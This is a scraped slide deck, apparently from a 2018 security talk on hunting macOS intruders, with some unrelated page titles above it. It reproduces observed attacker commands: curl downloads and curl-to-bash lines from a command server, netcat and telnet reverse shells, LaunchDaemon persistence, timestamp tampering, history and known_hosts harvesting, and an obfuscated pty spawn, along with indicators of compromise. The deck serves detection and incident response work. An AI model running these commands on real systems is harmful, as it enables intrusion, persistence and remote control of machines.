Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Macdoored
- 1. 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. MACDOORED JARON BRADLEY
- 2. `WHOAMI` § Incident Responder § Hunter § Detections Engineer § CrowdStrike SCAR Team § Author of OS X Incident Response Scripting and Analysis 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 3. MAC BASIC HUNTING OVERVIEW 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 4. THE IMPORTANCE OF THE PROCESS TREE launchd Sudoers File Modified vimjamf bash launchd Sudoers File Modified vim/var/tmp/a bash
- 5. DETECTION/ANALYSIS DIFFICULTIES § All the commands an attacker could ever need are on the system § Admin and Attacker activity can look like the same thing § Backdoors can be written in many different languages § Malware sample size incredibly small compared to Windows
- 6. ATTACKER TECHNIQUES § Mass Recon § Backdoor Installation § Persistence § Cleanup § Lateral Movement
- 7. RECON 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 8. RECON COMMANDS § sw_vers § /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full § dscl . -list /Users § Mass ping usage § dig § Uname § dns-sd -B <service> 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 9. BACKDOOR INSTALLATION 2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
- 10. BACKDOOR INSTALLATION § curl -O hxxp://61.78.62.21:8080/Tssd § chmod +x Tssd § mv /var/tmp/Tssd rutil § touch -r r2util rutil § ls -la /usr/local/bin/rutil § vim /etc/.cache § chmod 400 .cache
- 11. OTHER BACKDOOR CURLS § curl -O hxxp://61.78.62.21:8080/Tssd § curl -O hxxp://61.78.62.21:8080/Tss § curl -sO hxxp://61.78.62.21:8080/grrs
- 13. CURL ALL THE THINGS § curl -O hxxp://61.78.62.21:8080/1.txt -o /var/tmp/1.txt § curl hxxp://61.78.62.21:8080/5.txt | bash § curl hxxp://61.78.62.21:8080/5.txt%20|%20bash § curl hxxp://61.78.62.21:8080/5.txt%20|%20bash § curl hxxp://61.78.62.21:8080/5.txtx7cbash § curl hxxp://61.78.62.21:8080/5.txt%7cbash § curl hxxp://61.78.62.21:8080/5.txt || bash § curl hxxp://61.78.62.21:8080/x
- 14. FAILS § nc 61.78.62.21 53 -e /bin/sh § nc -e /bin/sh 61.78.62.21 53 § nc --e /bin/sh 61.78.62.21 53 § nc --exec /bin/sh 61.78.62.21 53 § /bin/sh | nc 61.78.62.21 53 § mknod /tmp/p p && telnet 61.78.62.21 53 0/tmp/p § curl -O hxxp://61.78.62.21:8080/nc
- 16. PERSISTENCE
- 17. STANDARD ASEPS § System Integrity Protection level § /System/Library/LaunchAgents § /System/Library/LaunchDaemons § Root Level § /Library/LaunchAgents § /Library/LaunchDaemons § User Level § ~/Library/LaunchAgents § ~/Library/LaunchDaemons § Some schedulers § cron § periodic § Mac malware has not reached the same level of creatively hiding its ASEPS
- 18. PERSISTENCE § vim com.apple.xsprinter.plist § /Library/LaunchDaemons/com.apple.xsprinter.plist § launchctl load -w /Library/LaunchDaemons/com.apple.xsprinter.plist
- 19. MORE THAN JUST A VERSION CHECK? § touch /usr/bin/x § rm –rf /usr/bin/x § uname -an § /usr/sbin/system_profiler -nospawn -xml SPHardwareDataYpe -detailLevel full § system_profiler SPHardwareDataYpe § system_profiler SPHardwareDataType § /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
- 20. PERSISTENCE APPLICATION § /System/Library/LaunchDaemons/com.apple.xsprinter.plist § touch -r ssh.plist com.apple.xsprinter.plist § launchctl load -w /System/Library/LaunchDaemons/com.apple.xsprinter.plist
- 22. CLEANUP
- 23. HIDING TIMESTAMPS § Removal of files § Hide access and modification timestamps § touch -r r2util rutil § touch -r profile .cache § touch -r com.cisco.anyconnect.aciseagentd.plist com.apple.xsprinter.plist § ssh user@ip -o UserKnownHostsFile=/dev/null
- 24. LATERAL MOVEMENT
- 25. LATERAL MOVEMENT § grep ssh .bash_history § cat known_hosts § curl -sO hxxp://61.78.62.21:8080/rs § ssh -TNfq -Frs • -T -> Disable pseudo-tty allocation. • -N -> Do not execute a remote command. This is useful for just forwarding ports (protocol version 2 only). • -f -> Requests ssh to go to background just before command execution • -F -> Specifies an alternative per-user configuration file.
- 26. SUDO
- 27. PTY|TTY § python -c import base64;exec(base64.b64decode('aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vY mFzaCcp'));
- 28. EXPLOITS IN THE REAL WORLD
- 30. STATIC INDICATORS § Backdoor § 8029e7b12742d67fe13fcd53953e6b03ca4fa09b1d5755f8f8289eac08366efc § a5f7b13d0f259277e40e3711070121e451415d7d3a5e68382fc82c2fe3635db1 § 5b0cc5dd2897e697751b8204d8b74edd66466d651d233c76899c5521a60f6527 § IPs § 61.78.62[.]21 (C2) § Backdoor File Names § /usr/local/bin/google-updater § /usr/local/bin/prl-monitor § /usr/local/bin/git-lf § /usr/local/sbin/nortonscanner § /usr/local/plutil § LaunchDaemon File Names § /Library/LaunchDaemons/com.apple.xsprinter.plist § /System/Library/LaunchDaemons/com.apple.xsprinter.plist
- 31. § Twitter: @jbradley89 § https://github.com/jbradley89/shakacon-yara § Questions?